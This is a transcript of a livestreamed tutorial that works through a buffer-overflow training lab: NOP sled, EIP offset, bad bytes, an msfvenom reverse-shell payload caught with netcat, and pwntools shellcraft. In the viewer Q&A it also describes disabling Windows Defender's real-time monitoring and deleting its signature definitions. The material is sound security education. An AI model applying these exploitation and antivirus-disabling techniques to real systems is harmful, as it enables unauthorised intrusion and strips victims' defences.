then we could land somewhere in that after our jump esp and we'll slide down the knob sled until we eventually get to our payload or the real shell code that we want to execute and again i would recommend make sure you still keep your actual data and the buffer that you send the same length as you originally started with so that means go ahead and subtract out the length of the knob slide and subtract out the length of the shell code the very very last thing you sent here should still kind of account for all the crap you just sent previously yeah yeah i think so so uh what did we just tell uh this to connect back to 9001 it looks like uh what i like to do is i like to make a comment just above my shell code where i keep track of the msf venom syntax that i use to create this so i know if i need to regenerate with a different port or different bad bites or anything like that yeah so theoretically if we did everything perfectly this is our buffer overflow exploit script uh looks like we've got with some black formatting about 80 lines of code 81 and let's see if we can get a reverse shell callback with this madness what i'm gonna do is open this up on the side let's start a bring that to the top over here start up a netcat listener 9001 let's get over to immunity and huh i'll hit ctrl f2 to restart it just for safe standing check i'll hit f9 to run it and then let's go into sublime text and hit control b to run this code there we go saw the shell come back right we literally executed shell code because we had this jump esp instruction that we were able to latch on to because we were able to clobber the instruction pointer bebop around the program enumerate what the bad bytes were so we knew what shell code we could use and then just cram it into a payload and weaponize it with a python script if i type in who am i we can see that we are that account um and we can move around the file system really do whatever we wanted to at this point so nice and easy we did it after an hour of hanging out and man a lot of trouble with rdp to begin with and let's get it started anyway what is the eip offset that was 1978 right yep in bite order and including the null bytes what were the bad characters oh so what were our bad characters oh just those ones that we included for the msf venom payload we can grab that right here boom why oh including null bites you dumbo uh what did we miss some do we did did we miss some bad bites would you be able to really quickly re-explain how you generated the shell cut yes absolutely i can totally do that for you rocket sheep and then i think i might start to wind this down because it's uh 1 30 in the morning all right so we generated shell code with the msf venom utility msf venom will take a specific payload that you want to try and execute you can do things like command run something in windows or like pop calc or do anything that you could do with showca oftentimes what we'd like to do is just get a simple reverse shell shell reverse tcp you could use meterpreter if you really wanted to or anything like that and then make sure if you want to use the stage less process which you often want to do um if you are going to catch this with netcat because if you use a staged one with the forward slash you'll need to make sure you catch this in metasploits msf console exploit multihandler personally i like to catch things in netcat or pwncat so i just use the stageless one with the underscore and then we specify the arguments that we might want to use for that payload or what you want the parameters and things the settings that you need so i'm setting the lhost which will realistically be your ip address that was 10 10 186.54 or whatever you can specify an interface and metasploit totally knows what to do with it so time zero is much more easier uh than that typing or remembering the ip editors every time specifying your l port you could specify literally anything that you want to listen on tack f to specify the format we know tac pi is what we're looking for and then shell code or a variable name you can specify with tag v but don't forget you'll want to specify those bad bytes with tac b and we just specified that way over here so we can let that churn out and it takes a quick second but you can build all things just like that uh msfnm is nice and fun uh but again if you are into the pwn tools realm let's uh let's get b python open again let's import pong oh god sorry from from pwn import everything um just be just be python not like that maybe maybe regular python from pwn import all or is that going to break [ __ ] again what oh i have an extra r but what what python 3.8 there we go okay uh could i use b python with that i'm sorry i'm i'm totally on a tangent i'm sorry be python inversion that thing but from pwn import all does not want to play nice right now uh b python there is a question is b python a lightweight python interpreter uh i don't exactly know it is another python interpreter i like to use it because it has like syntax highlighting and i think that's very very nice for demonstrations and like showcasing content but what i'm trying to discuss is that pwntools has this utility shell craft and shellcraft will let you craft shell code does help turn no whatever i believe you can use shellcraft dot processor type yeah uh like i386 or amd64 or any of those i386 we can use for an example and then you could specify the platform whether or not you want it to be linux or windows but the linux is the one that i know off the top of my head and then you can make it do specific things like run specific things and this will return out to you what assembly code would normally be used to actually do that if i were to print that out you can see this is the assembly code to execute that if you wanted to get the assembly bytes for that pawn tools has a handy function asm to get the assembly and boom now you have the legitimate raw bytes this is super duper nice because you could just very very easily say hey i want you to run the cat command and i want you to cat out a file called flag.text boom there's your shell code or again if you wanted the literal interpretation of that you get all that there are some really really nice handy things that you could do in that library of shellcraft but uh again if you're doing pwntools things rather than msf venom rockshep is saying is there a reason you steer away from pawn tools generally i don't and i and i if if you know that you can use pwntools and you want to use pwntools uh i would always recommend using it the reason that i i guess tend to talk around it these days is because i'm showcasing this content for you to learn um and especially without doing things in like offensive security like oscp exam or for elearn security ecppt etc i think when they try to recreate it and run and test the uh script i don't want there to be any confusion uh about them having phone tools installed or not installed so i just tend to use built-in libraries when i when i have to submit this as like an exam or an assessment but again in the real world if you got pwn tools bro just use power tools uh i'm missing a lot of questions in chat i'm super sorry nita was asking hey how did you actually send the payload over our python script handles this really really nicely for us with just a simple context manager we use a width statement and connect the socket and send it that's all it takes oreobite is asking hey will this vod be up if i missed something yes absolutely this bottle will be up on twitch and of course i'll upload it to youtube and i think those should start to kick in by the end of the week or so so slickpopstream says am i writing thinking this can easily be caught by intrusion detection as a plane takes connection out from the target or antivirus as recognizable shell code for members of venom yes you are absolutely correct in thinking that um because interpreter itself is going to get caught by windows defender really really easy um sorry if you were to obfuscate meterpreter and you can try to like hide it you could try to like bundle up and pack the executable for it to do something different um it might work but defender will literally trigger off of the network traffic of meterpreter so that will always be a bad time if you're trying to use an interpreter or a pure interpreter now against a machine that has windows defender enabled normally your best bet is to try and obfuscate and get some access with commanding control or c2 framework where you can remain stealthy and try to be undetected with obfuscation and evasion tricks like that and then uh escalate your privileges do whatever prives stuff you need to do and just destroy defender like kill it nerf it set mp preference disable real-time monitoring true literally run mpcmd.run and just delete all defender signatures i really love using that trick if set mp preference isn't available and then once you have forced defender off use meterpreter use whatever you want to do you can totally wreak havoc once you turn off the av what to do when you can't disable windows defender as system um is there a reason why i mean i guess like for scoping for like rules of engagement hey you're not allowed to turn off the av then you just have to get really clever try and obfuscate try and do evasion it's tough to do it just gives an error uh i don't know what you mean is there a reason why i am currently running in a windows 2019 server i won't let me sink in zoom in is it usually harder to evade third party av like kaspersky uh maybe i really can't give you an absolute definitive like absolutely certain answer to that um because it totally depends on what they're tracking what they're doing and it changes all the time i personally and maybe i'm a bit biased i am a extreme supporter and a huge supporter of windows defender i think it has become a formidable foe and is very very tough to get around these days so i got real time protection on and everything right now but if i were to try and set mp preference to disable real time monitoring to true looks like that succeeded for me and real-time protection is now off that's just one example there we go and that will do the thing you're talking about the windows defender service um um like windows defender antivirus oh this guy yeah yeah it's totally not gonna let not gonna want you to to touch that i don't know if that's going to be easily something that i could answer off the top of my head right now at one in the morning but yeah you just straight up can't touch it what was the other thing you said to do when you can't disable mp preference let me uh let me track that down in my osap notes i don't think there's any issue with me showing that right now hopefully not i open another vault um open f nfs certs oh sep workspace select folder ta-da don't look at my exam everybody please please don't look at my exam um obsidian there it is oh what do we got what do we got what do we got reference lookup um i think i can search for disable defender oh oh this is it this is it right here let me nerf this and not not run the risk of showcasing any sensitive things so this is a super jerk move uh that is one of my favorites though try to just straight up kill uh all of the defender definitions run the original mpc like the actual engine and executable for defender and then remove definitions all of them uh so that's a good cmd.exe trick if powershell said empty preference isn't working for you uh yeah yeah uh let's hang out in the chat for a little bit thanks so much for being with me everybody i'm going to stop recording the youtube video sake uh to allow this to offer some resolution for people tuning in on the youtube video i hope you enjoyed some obviously we haven't even worked through the whole rest of that try hack me room but we could continue and i literally didn't have the bites right wow there are so many of these we don't need to do all that right now maybe i could do it later oh ooh i think you had an extra oh the 2d one was wrong thank you ghost x ghost and then we got to do this all over again for overflow two and three and oh my god okay thanks so much for watching everybody that's tuning in on youtube i hope you enjoyed this i'm gonna hang out with the twitch stream people i love you bye
Info
Channel: John Hammond
Views: 28,428
Rating: undefined out of 5
Keywords:
Id: eLIRjcI5eYU
Channel Id: undefined
Length: 86min 3sec (5163 seconds)
Published: Mon Sep 13 2021
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.